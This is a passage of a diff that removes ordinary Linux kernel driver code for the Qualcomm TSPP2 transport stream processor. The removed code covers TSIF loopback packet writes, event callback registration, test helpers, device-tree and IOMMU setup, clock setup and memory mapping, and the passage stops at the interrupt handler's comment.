-- *
-- * @src_handle: Source to feed data to.
-- * @data: data buffer containing one TS packet of size 188 Bytes.
-- *
-- * Write one TS packet of size 188 bytes to the TSIF loopback interface.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_tsif_data_write(u32 src_handle, u32 *data)
--{
-- int i;
-- int ret;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
-- struct tspp2_tsif_device *tsif_device;
-- const unsigned int loopback_flags[3] = {0x01000000, 0, 0x02000000};
--
-- if (data == NULL) {
-- pr_err("%s: NULL data\n", __func__);
-- return -EINVAL;
-- }
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- goto err_inval;
-- }
--
-- if (!src->enabled) {
-- pr_err("%s: Source not enabled\n", __func__);
-- goto err_inval;
-- }
--
-- if ((src->input != TSPP2_INPUT_TSIF0)
-- && (src->input != TSPP2_INPUT_TSIF1)) {
-- pr_err("%s: Invalid source input\n", __func__);
-- goto err_inval;
-- }
--
-- tsif_device = &src->device->tsif_devices[src->input];
--
-- /* lpbk_flags : start && !last */
-- writel_relaxed(loopback_flags[0],
-- tsif_device->base + TSPP2_TSIF_LPBK_FLAGS);
--
-- /* 1-st dword of data */
-- writel_relaxed(data[0],
-- tsif_device->base + TSPP2_TSIF_LPBK_DATA);
--
-- /* Clear start bit */
-- writel_relaxed(loopback_flags[1],
-- tsif_device->base + TSPP2_TSIF_LPBK_FLAGS);
--
-- /* 45 more dwords */
-- for (i = 1; i < 46; i++)
-- writel_relaxed(data[i],
-- tsif_device->base + TSPP2_TSIF_LPBK_DATA);
--
-- /* Set last bit */
-- writel_relaxed(loopback_flags[2],
-- tsif_device->base + TSPP2_TSIF_LPBK_FLAGS);
--
-- /* Last data dword */
--
writel_relaxed(data[46], tsif_device->base + TSPP2_TSIF_LPBK_DATA);
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--
--err_inval:
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- return -EINVAL;
--}
--EXPORT_SYMBOL(tspp2_tsif_data_write);
--
--/* Event notification API functions */
--
--/**
-- * tspp2_global_event_notification_register() - Get notified on a global event.
-- *
-- * @dev_id: TSPP2 device ID.
-- * @global_event_bitmask: A bitmask of global events,
-- * TSPP2_GLOBAL_EVENT_XXX.
-- * @callback: User callback function.
-- * @cookie: User information passed to the callback.
-- *
-- * Register a user callback which will be invoked when certain global
-- * events occur. Note the values (mask, callback and cookie) are overwritten
-- * when calling this function multiple times. Therefore it is possible to
-- * "unregister" a callback by calling this function with the bitmask set to 0
-- * and with NULL callback and cookie.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_global_event_notification_register(u32 dev_id,
-- u32 global_event_bitmask,
-- void (*callback)(void *cookie, u32 event_bitmask),
-- void *cookie)
--{
-- struct tspp2_device *device;
-- unsigned long flags;
-- u32 reg = 0;
--
-- if (dev_id >= TSPP2_NUM_DEVICES) {
-- pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
-- return -ENODEV;
-- }
--
-- device = tspp2_devices[dev_id];
-- if (!device) {
-- pr_err("%s: Invalid device\n", __func__);
-- return -ENODEV;
-- }
--
-- if (mutex_lock_interruptible(&device->mutex))
-- return -ERESTARTSYS;
--
-- if (!device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&device->mutex);
-- return -EPERM;
-- }
--
-- /*
-- * Some of the interrupts that are generated when these events occur
-- * may be disabled due to module parameters. So we make sure to enable
-- * them here, depending on which event was requested. If some events
-- * were requested before and now this function is called again with
-- * other events, though, we want to restore the interrupt configuration
-- * to the default state according to the module parameters.
-- */
-- reg = readl_relaxed(device->base + TSPP2_GLOBAL_IRQ_ENABLE);
-- if (global_event_bitmask & TSPP2_GLOBAL_EVENT_INVALID_AF_CTRL) {
-- reg |= (0x1 << GLOBAL_IRQ_TSP_INVALID_AF_OFFS);
-- } else {
-- if (tspp2_en_invalid_af_ctrl)
-- reg |= (0x1 << GLOBAL_IRQ_TSP_INVALID_AF_OFFS);
-- else
-- reg &= ~(0x1 << GLOBAL_IRQ_TSP_INVALID_AF_OFFS);
-- }
--
-- if (global_event_bitmask & TSPP2_GLOBAL_EVENT_INVALID_AF_LENGTH) {
-- reg |= (0x1 << GLOBAL_IRQ_TSP_INVALID_LEN_OFFS);
-- } else {
-- if (tspp2_en_invalid_af_length)
-- reg |= (0x1 << GLOBAL_IRQ_TSP_INVALID_LEN_OFFS);
-- else
-- reg &= ~(0x1 << GLOBAL_IRQ_TSP_INVALID_LEN_OFFS);
-- }
--
-- if (global_event_bitmask & TSPP2_GLOBAL_EVENT_PES_NO_SYNC) {
-- reg |= (0x1 << GLOBAL_IRQ_PES_NO_SYNC_OFFS);
-- } else {
-- if (tspp2_en_pes_no_sync)
-- reg |= (0x1 << GLOBAL_IRQ_PES_NO_SYNC_OFFS);
-- else
-- reg &= ~(0x1 << GLOBAL_IRQ_PES_NO_SYNC_OFFS);
-- }
--
-- writel_relaxed(reg, device->base + TSPP2_GLOBAL_IRQ_ENABLE);
--
-- spin_lock_irqsave(&device->spinlock, flags);
-- device->event_callback = callback;
-- device->event_cookie = cookie;
-- device->event_bitmask = global_event_bitmask;
-- spin_unlock_irqrestore(&device->spinlock, flags);
--
-- mutex_unlock(&device->mutex);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_global_event_notification_register);
--
--/**
-- * tspp2_src_event_notification_register() - Get notified on a source event.
-- *
-- * @src_handle: Source handle.
-- * @src_event_bitmask: A bitmask of source events,
-- * TSPP2_SRC_EVENT_XXX.
-- * @callback: User callback function.
-- * @cookie: User information passed to the callback.
-- *
-- * Register a user callback which will be invoked when certain source
-- * events occur. Note the values (mask, callback and cookie) are overwritten
-- * when calling this function multiple times.
Therefore it is possible to
-- * "unregister" a callback by calling this function with the bitmask set to 0
-- * and with NULL callback and cookie.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_event_notification_register(u32 src_handle,
-- u32 src_event_bitmask,
-- void (*callback)(void *cookie, u32 event_bitmask),
-- void *cookie)
--{
-- int ret;
-- u32 reg;
-- unsigned long flags;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- goto err_inval;
-- }
--
-- if (((src->input == TSPP2_INPUT_TSIF0) ||
-- (src->input == TSPP2_INPUT_TSIF1)) &&
-- ((src_event_bitmask & TSPP2_SRC_EVENT_MEMORY_READ_ERROR) ||
-- (src_event_bitmask & TSPP2_SRC_EVENT_FLOW_CTRL_STALL))) {
-- pr_err("%s: Invalid event bitmask for a source with TSIF input\n",
-- __func__);
-- goto err_inval;
-- }
--
-- if ((src->input == TSPP2_INPUT_MEMORY) &&
-- ((src_event_bitmask & TSPP2_SRC_EVENT_TSIF_LOST_SYNC) ||
-- (src_event_bitmask & TSPP2_SRC_EVENT_TSIF_TIMEOUT) ||
-- (src_event_bitmask & TSPP2_SRC_EVENT_TSIF_OVERFLOW) ||
-- (src_event_bitmask & TSPP2_SRC_EVENT_TSIF_PKT_READ_ERROR) ||
-- (src_event_bitmask & TSPP2_SRC_EVENT_TSIF_PKT_WRITE_ERROR))) {
-- pr_err("%s: Invalid event bitmask for a source with memory input\n",
-- __func__);
-- goto err_inval;
-- }
--
--
spin_lock_irqsave(&src->device->spinlock, flags);
-- src->event_callback = callback;
-- src->event_cookie = cookie;
-- src->event_bitmask = src_event_bitmask;
-- spin_unlock_irqrestore(&src->device->spinlock, flags);
--
-- /* Enable/disable flow control stall interrupt on the source */
-- reg = readl_relaxed(src->device->base + TSPP2_GLOBAL_IRQ_ENABLE);
-- if (callback && (src_event_bitmask & TSPP2_SRC_EVENT_FLOW_CTRL_STALL)) {
-- reg |= ((0x1 << src->hw_index) <<
-- GLOBAL_IRQ_FC_STALL_OFFS);
-- } else {
-- reg &= ~((0x1 << src->hw_index) <<
-- GLOBAL_IRQ_FC_STALL_OFFS);
-- }
-- writel_relaxed(reg, src->device->base + TSPP2_GLOBAL_IRQ_ENABLE);
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--
--err_inval:
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- return -EINVAL;
--}
--EXPORT_SYMBOL(tspp2_src_event_notification_register);
--
--/**
-- * tspp2_filter_event_notification_register() - Get notified on a filter event.
-- *
-- * @filter_handle: Filter handle.
-- * @filter_event_bitmask: A bitmask of filter events,
-- * TSPP2_FILTER_EVENT_XXX.
-- * @callback: User callback function.
-- * @cookie: User information passed to the callback.
-- *
-- * Register a user callback which will be invoked when certain filter
-- * events occur. Note the values (mask, callback and cookie) are overwritten
-- * when calling this function multiple times. Therefore it is possible to
-- * "unregister" a callback by calling this function with the bitmask set to 0
-- * and with NULL callback and cookie.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_event_notification_register(u32 filter_handle,
-- u32 filter_event_bitmask,
-- void (*callback)(void *cookie, u32 event_bitmask),
-- void *cookie)
--{
-- int ret;
-- int idx;
-- u32 reg;
-- unsigned long flags;
-- struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--
-- if (!filter) {
-- pr_err("%s: Invalid filter handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(filter->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&filter->device->mutex)) {
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!filter->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EPERM;
-- }
--
-- if (!filter->opened) {
-- pr_err("%s: Filter not opened\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EINVAL;
-- }
--
-- spin_lock_irqsave(&filter->device->spinlock, flags);
-- filter->event_callback = callback;
-- filter->event_cookie = cookie;
-- filter->event_bitmask = filter_event_bitmask;
-- spin_unlock_irqrestore(&filter->device->spinlock, flags);
--
-- /* Enable/disable SC high/low interrupts per filter as requested */
-- idx = (filter->context >> 5);
-- reg = readl_relaxed(filter->device->base +
-- TSPP2_SC_GO_HIGH_ENABLE(idx));
-- if (callback &&
-- (filter_event_bitmask & TSPP2_FILTER_EVENT_SCRAMBLING_HIGH)) {
-- reg |= (0x1 << TSPP2_MODULUS_OP(filter->context, 32));
-- } else {
-- reg &= ~(0x1 << TSPP2_MODULUS_OP(filter->context, 32));
-- }
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_SC_GO_HIGH_ENABLE(idx));
--
-- reg = readl_relaxed(filter->device->base +
-- TSPP2_SC_GO_LOW_ENABLE(idx));
-- if (callback &&
-- (filter_event_bitmask & TSPP2_FILTER_EVENT_SCRAMBLING_LOW)) {
-- reg |= (0x1 << TSPP2_MODULUS_OP(filter->context, 32));
-- } else {
-- reg &= ~(0x1 << TSPP2_MODULUS_OP(filter->context, 32));
-- }
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_SC_GO_LOW_ENABLE(idx));
--
-- mutex_unlock(&filter->device->mutex);
--
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_event_notification_register);
--
--/**
-- * tspp2_get_filter_hw_index() - Get a filter's hardware index.
-- *
-- * @filter_handle: Filter handle.
-- *
-- * This is an helper function to support tspp2 auto-testing.
-- *
-- * Return the filter's hardware index on success, error value otherwise.
-- */
--int tspp2_get_filter_hw_index(u32 filter_handle)
--{
-- struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
-- if (!filter_handle)
-- return -EINVAL;
-- return filter->hw_index;
--}
--EXPORT_SYMBOL(tspp2_get_filter_hw_index);
--
--/**
-- * tspp2_get_reserved_hw_index() - Get a source's reserved hardware index.
-- *
-- * @src_handle: Source handle.
-- *
-- * This is an helper function to support tspp2 auto-testing.
-- *
-- * Return the source's reserved hardware index on success,
-- * error value otherwise.
-- */
--int tspp2_get_reserved_hw_index(u32 src_handle)
--{
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
-- if (!src_handle)
-- return -EINVAL;
-- return src->reserved_filter_hw_index;
--}
--EXPORT_SYMBOL(tspp2_get_reserved_hw_index);
--
--/**
-- * tspp2_get_ops_array() - Get filter's operations.
-- *
-- * @filter_handle: Filter handle.
-- * @ops_array: The filter's operations.
-- * @num_of_ops: The filter's number of operations.
-- *
-- * This is an helper function to support tspp2 auto-testing.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_get_ops_array(u32 filter_handle,
-- struct tspp2_operation ops_array[TSPP2_MAX_OPS_PER_FILTER],
-- u8 *num_of_ops)
--{
-- int i;
-- struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
-- if (!filter_handle || !num_of_ops)
-- return -EINVAL;
-- *num_of_ops = filter->num_user_operations;
-- for (i = 0; i < *num_of_ops; i++)
-- ops_array[i] = filter->operations[i];
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_get_ops_array);
--
--/* Platform driver related functions: */
--
--/**
-- * msm_tspp2_dt_to_pdata() - Copy device-tree data to platfrom data structure.
-- *
-- * @pdev: Platform device.
-- *
-- * Return pointer to allocated platform data on success, NULL on failure.
-- */
--static struct msm_tspp2_platform_data *
--msm_tspp2_dt_to_pdata(struct platform_device *pdev)
--{
-- struct device_node *node = pdev->dev.of_node;
-- struct msm_tspp2_platform_data *data;
-- int rc;
--
-- /* Note: memory allocated by devm_kzalloc is freed automatically */
-- data = devm_kzalloc(&pdev->dev, sizeof(*data), GFP_KERNEL);
-- if (!data) {
-- pr_err("%s: Unable to allocate platform data\n", __func__);
-- return NULL;
-- }
--
-- /* Get power regulator */
-- if (!of_get_property(node, "vdd-supply", NULL)) {
-- pr_err("%s: Could not find vdd-supply property\n", __func__);
-- return NULL;
-- }
--
-- /* Get IOMMU information */
-- rc = of_property_read_string(node, "qcom,iommu-hlos-group",
-- &data->hlos_group);
-- if (rc) {
-- pr_err("%s: Could not find iommu-hlos-group property, err = %d\n",
-- __func__, rc);
-- return NULL;
-- }
-- rc = of_property_read_string(node, "qcom,iommu-cpz-group",
-- &data->cpz_group);
-- if (rc) {
-- pr_err("%s: Could not find iommu-cpz-group property, err = %d\n",
-- __func__, rc);
-- return NULL;
-- }
-- rc = of_property_read_u32(node, "qcom,iommu-hlos-partition",
-- &data->hlos_partition);
-- if (rc) {
-- pr_err("%s: Could not find iommu-hlos-partition property, err = %d\n",
-- __func__, rc);
-- return NULL;
-- }
-- rc =
of_property_read_u32(node, "qcom,iommu-cpz-partition",
-- &data->cpz_partition);
-- if (rc) {
-- pr_err("%s: Could not find iommu-cpz-partition property, err = %d\n",
-- __func__, rc);
-- return NULL;
-- }
--
-- return data;
--}
--
--static void msm_tspp2_iommu_info_free(struct tspp2_device *device)
--{
-- if (device->iommu_info.hlos_group) {
-- iommu_group_put(device->iommu_info.hlos_group);
-- device->iommu_info.hlos_group = NULL;
-- }
--
-- if (device->iommu_info.cpz_group) {
-- iommu_group_put(device->iommu_info.cpz_group);
-- device->iommu_info.cpz_group = NULL;
-- }
--
-- device->iommu_info.hlos_domain = NULL;
-- device->iommu_info.cpz_domain = NULL;
-- device->iommu_info.hlos_domain_num = -1;
-- device->iommu_info.cpz_domain_num = -1;
-- device->iommu_info.hlos_partition = -1;
-- device->iommu_info.cpz_partition = -1;
--}
--
--/**
-- * msm_tspp2_iommu_info_get() - Get IOMMU information.
-- *
-- * @pdev: Platform device, containing platform information.
-- * @device: TSPP2 device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int msm_tspp2_iommu_info_get(struct platform_device *pdev,
-- struct tspp2_device *device)
--{
-- int ret = 0;
-- struct msm_tspp2_platform_data *data = pdev->dev.platform_data;
--
-- device->iommu_info.hlos_group = NULL;
-- device->iommu_info.cpz_group = NULL;
-- device->iommu_info.hlos_domain = NULL;
-- device->iommu_info.cpz_domain = NULL;
-- device->iommu_info.hlos_domain_num = -1;
-- device->iommu_info.cpz_domain_num = -1;
-- device->iommu_info.hlos_partition = -1;
-- device->iommu_info.cpz_partition = -1;
--
-- device->iommu_info.hlos_group = iommu_group_find(data->hlos_group);
-- if (!device->iommu_info.hlos_group) {
-- dev_err(&pdev->dev, "%s: Cannot find IOMMU HLOS group",
-- __func__);
-- ret = -EINVAL;
-- goto err_out;
-- }
-- device->iommu_info.cpz_group = iommu_group_find(data->cpz_group);
-- if (!device->iommu_info.cpz_group) {
-- dev_err(&pdev->dev, "%s: Cannot find IOMMU CPZ group",
-- __func__);
-- ret = -EINVAL;
-- goto err_out;
-- }
--
-- device->iommu_info.hlos_domain =
-- iommu_group_get_iommudata(device->iommu_info.hlos_group);
-- if (IS_ERR_OR_NULL(device->iommu_info.hlos_domain)) {
-- dev_err(&pdev->dev, "%s: iommu_group_get_iommudata failed",
-- __func__);
-- ret = -EINVAL;
-- goto err_out;
-- }
--
-- device->iommu_info.cpz_domain =
-- iommu_group_get_iommudata(device->iommu_info.cpz_group);
-- if (IS_ERR_OR_NULL(device->iommu_info.cpz_domain)) {
-- device->iommu_info.hlos_domain = NULL;
-- dev_err(&pdev->dev, "%s: iommu_group_get_iommudata failed",
-- __func__);
-- ret = -EINVAL;
-- goto err_out;
-- }
--
-- device->iommu_info.hlos_domain_num =
-- msm_find_domain_no(device->iommu_info.hlos_domain);
-- device->iommu_info.cpz_domain_num =
-- msm_find_domain_no(device->iommu_info.cpz_domain);
-- device->iommu_info.hlos_partition = data->hlos_partition;
-- device->iommu_info.cpz_partition = data->cpz_partition;
--
-- return 0;
--
--err_out:
-- msm_tspp2_iommu_info_free(device);
--
-- return ret;
--}
--
--/**
-- *
tspp2_clocks_put() - Put clocks and disable regulator.
-- *
-- * @device: TSPP2 device.
-- */
--static void tspp2_clocks_put(struct tspp2_device *device)
--{
-- if (device->tsif_ref_clk)
-- clk_put(device->tsif_ref_clk);
--
-- if (device->tspp2_klm_ahb_clk)
-- clk_put(device->tspp2_klm_ahb_clk);
--
-- if (device->tspp2_vbif_clk)
-- clk_put(device->tspp2_vbif_clk);
--
-- if (device->vbif_ahb_clk)
-- clk_put(device->vbif_ahb_clk);
--
-- if (device->vbif_axi_clk)
-- clk_put(device->vbif_axi_clk);
--
-- if (device->tspp2_core_clk)
-- clk_put(device->tspp2_core_clk);
--
-- if (device->tspp2_ahb_clk)
-- clk_put(device->tspp2_ahb_clk);
--
-- device->tspp2_ahb_clk = NULL;
-- device->tspp2_core_clk = NULL;
-- device->tspp2_vbif_clk = NULL;
-- device->vbif_ahb_clk = NULL;
-- device->vbif_axi_clk = NULL;
-- device->tspp2_klm_ahb_clk = NULL;
-- device->tsif_ref_clk = NULL;
--}
--
--/**
-- * msm_tspp2_clocks_setup() - Get clocks and set their rate, enable regulator.
-- *
-- * @pdev: Platform device, containing platform information.
-- * @device: TSPP2 device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int msm_tspp2_clocks_setup(struct platform_device *pdev,
-- struct tspp2_device *device)
--{
-- int ret = 0;
-- unsigned long rate_in_hz = 0;
-- struct clk *tspp2_core_clk_src = NULL;
--
-- /* Get power regulator (GDSC) */
-- device->gdsc = devm_regulator_get(&pdev->dev, "vdd");
-- if (IS_ERR(device->gdsc)) {
-- pr_err("%s: Failed to get vdd power regulator\n", __func__);
-- ret = PTR_ERR(device->gdsc);
-- device->gdsc = NULL;
-- return ret;
-- }
--
-- device->tspp2_ahb_clk = NULL;
-- device->tspp2_core_clk = NULL;
-- device->tspp2_vbif_clk = NULL;
-- device->vbif_ahb_clk = NULL;
-- device->vbif_axi_clk = NULL;
-- device->tspp2_klm_ahb_clk = NULL;
-- device->tsif_ref_clk = NULL;
--
-- device->tspp2_ahb_clk = clk_get(&pdev->dev, "bcc_tspp2_ahb_clk");
-- if (IS_ERR(device->tspp2_ahb_clk)) {
-- pr_err("%s: Failed to get %s", __func__, "bcc_tspp2_ahb_clk");
-- ret = PTR_ERR(device->tspp2_ahb_clk);
-- device->tspp2_ahb_clk = NULL;
-- goto err_clocks;
-- }
--
-- device->tspp2_core_clk = clk_get(&pdev->dev, "bcc_tspp2_core_clk");
-- if (IS_ERR(device->tspp2_core_clk)) {
-- pr_err("%s: Failed to get %s", __func__, "bcc_tspp2_core_clk");
-- ret = PTR_ERR(device->tspp2_core_clk);
-- device->tspp2_core_clk = NULL;
-- goto err_clocks;
-- }
--
-- device->tspp2_vbif_clk = clk_get(&pdev->dev, "bcc_vbif_tspp2_clk");
-- if (IS_ERR(device->tspp2_vbif_clk)) {
-- pr_err("%s: Failed to get %s", __func__, "bcc_vbif_tspp2_clk");
-- ret = PTR_ERR(device->tspp2_vbif_clk);
-- device->tspp2_vbif_clk = NULL;
-- goto err_clocks;
-- }
--
-- device->vbif_ahb_clk = clk_get(&pdev->dev, "iface_vbif_clk");
-- if (IS_ERR(device->vbif_ahb_clk)) {
-- pr_err("%s: Failed to get %s", __func__, "iface_vbif_clk");
-- ret = PTR_ERR(device->vbif_ahb_clk);
-- device->vbif_ahb_clk = NULL;
-- goto err_clocks;
-- }
--
-- device->vbif_axi_clk = clk_get(&pdev->dev, "vbif_core_clk");
-- if (IS_ERR(device->vbif_axi_clk)) {
-- pr_err("%s: Failed to get %s", __func__, "vbif_core_clk");
-- ret =
PTR_ERR(device->vbif_axi_clk);
-- device->vbif_axi_clk = NULL;
-- goto err_clocks;
-- }
--
-- device->tspp2_klm_ahb_clk = clk_get(&pdev->dev, "bcc_klm_ahb_clk");
-- if (IS_ERR(device->tspp2_klm_ahb_clk)) {
-- pr_err("%s: Failed to get %s", __func__, "bcc_klm_ahb_clk");
-- ret = PTR_ERR(device->tspp2_klm_ahb_clk);
-- device->tspp2_klm_ahb_clk = NULL;
-- goto err_clocks;
-- }
--
-- device->tsif_ref_clk = clk_get(&pdev->dev, "gcc_tsif_ref_clk");
-- if (IS_ERR(device->tsif_ref_clk)) {
-- pr_err("%s: Failed to get %s", __func__, "gcc_tsif_ref_clk");
-- ret = PTR_ERR(device->tsif_ref_clk);
-- device->tsif_ref_clk = NULL;
-- goto err_clocks;
-- }
--
-- /* Set relevant clock rates */
-- rate_in_hz = clk_round_rate(device->tsif_ref_clk, 1);
-- if (clk_set_rate(device->tsif_ref_clk, rate_in_hz)) {
-- pr_err("%s: Failed to set rate %lu to %s\n", __func__,
-- rate_in_hz, "gcc_tsif_ref_clk");
-- goto err_clocks;
-- }
--
-- /* We need to set the rate of tspp2_core_clk_src */
-- tspp2_core_clk_src = clk_get_parent(device->tspp2_core_clk);
-- if (tspp2_core_clk_src) {
-- rate_in_hz = clk_round_rate(tspp2_core_clk_src, 1);
-- if (clk_set_rate(tspp2_core_clk_src, rate_in_hz)) {
-- pr_err("%s: Failed to set rate %lu to tspp2_core_clk_src\n",
-- __func__, rate_in_hz);
-- goto err_clocks;
-- }
-- } else {
-- pr_err("%s: Failed to get tspp2_core_clk parent\n", __func__);
-- goto err_clocks;
-- }
--
-- return 0;
--
--err_clocks:
-- tspp2_clocks_put(device);
--
-- return ret;
--}
--
--/**
-- * msm_tspp2_map_io_memory() - Map memory resources to kernel space.
-- *
-- * @pdev: Platform device, containing platform information.
-- * @device: TSPP2 device.
-- *
-- * Return 0 on success, error value otherwise.
-- */ --static int msm_tspp2_map_io_memory(struct platform_device *pdev, -- struct tspp2_device *device) --{ -- struct resource *mem_tsif0; -- struct resource *mem_tsif1; -- struct resource *mem_tspp2; -- struct resource *mem_bam; -- -- /* Get memory resources */ -- mem_tsif0 = platform_get_resource_byname(pdev, -- IORESOURCE_MEM, "MSM_TSIF0"); -- if (!mem_tsif0) { -- dev_err(&pdev->dev, "%s: Missing TSIF0 MEM resource", __func__); -- return -ENXIO; -- } -- -- mem_tsif1 = platform_get_resource_byname(pdev, -- IORESOURCE_MEM, "MSM_TSIF1"); -- if (!mem_tsif1) { -- dev_err(&pdev->dev, "%s: Missing TSIF1 MEM resource", __func__); -- return -ENXIO; -- } -- -- mem_tspp2 = platform_get_resource_byname(pdev, -- IORESOURCE_MEM, "MSM_TSPP2"); -- if (!mem_tspp2) { -- dev_err(&pdev->dev, "%s: Missing TSPP2 MEM resource", __func__); -- return -ENXIO; -- } -- -- mem_bam = platform_get_resource_byname(pdev, -- IORESOURCE_MEM, "MSM_TSPP2_BAM"); -- if (!mem_bam) { -- dev_err(&pdev->dev, "%s: Missing BAM MEM resource", __func__); -- return -ENXIO; -- } -- -- /* Map memory physical addresses to kernel space */ -- device->tsif_devices[0].base = ioremap(mem_tsif0->start, -- resource_size(mem_tsif0)); -- if (!device->tsif_devices[0].base) { -- dev_err(&pdev->dev, "%s: ioremap failed", __func__); -- goto err_map_tsif0; -- } -- -- device->tsif_devices[1].base = ioremap(mem_tsif1->start, -- resource_size(mem_tsif1)); -- if (!device->tsif_devices[1].base) { -- dev_err(&pdev->dev, "%s: ioremap failed", __func__); -- goto err_map_tsif1; -- } -- -- device->base = ioremap(mem_tspp2->start, resource_size(mem_tspp2)); -- if (!device->base) { -- dev_err(&pdev->dev, "%s: ioremap failed", __func__); -- goto err_map_dev; -- } -- -- memset(&device->bam_props, 0, sizeof(device->bam_props)); -- device->bam_props.phys_addr = mem_bam->start; -- device->bam_props.virt_addr = ioremap(mem_bam->start, -- resource_size(mem_bam)); -- if (!device->bam_props.virt_addr) { -- dev_err(&pdev->dev, "%s: ioremap 
failed", __func__); -- goto err_map_bam; -- } -- -- return 0; -- --err_map_bam: -- iounmap(device->base); -- --err_map_dev: -- iounmap(device->tsif_devices[1].base); -- --err_map_tsif1: -- iounmap(device->tsif_devices[0].base); -- --err_map_tsif0: -- return -ENXIO; --} -- --/** -- * tspp2_event_work_prepare() - Prepare and queue a work element. -- * -- * @device: TSPP2 device. -- * @callback: User callback to invoke. -- * @cookie: User cookie. -- * @event_bitmask: Event bitmask -- * -- * Get a free work element from the pool, prepare it and queue it -- * to the work queue. When scheduled, the work will invoke the user callback -- * for the event that the HW reported. -- */ --static void tspp2_event_work_prepare(struct tspp2_device *device, -- void (*callback)(void *cookie, u32 event_bitmask), -- void *cookie, -- u32 event_bitmask) --{ -- struct tspp2_event_work *work = NULL; -- -- if (!list_empty(&device->free_work_list)) { -- work = list_first_entry(&device->free_work_list, -- struct tspp2_event_work, link); -- list_del(&work->link); -- work->callback = callback; -- work->cookie = cookie; -- work->event_bitmask = event_bitmask; -- queue_work(device->work_queue, &work->work); -- } else { -- pr_warn("%s: No available work element\n", __func__); -- } --} -- --/** -- * tspp2_isr() - TSPP2 interrupt handler. -- * -- * @irq: Interrupt number. -- * @dev: TSPP2 device. -- * -- * Handle TSPP2 HW interrupt. Collect relevant statistics and invoke -- * user registered callbacks for global, source or filter events. -- * -- * Return IRQ_HANDLED. 
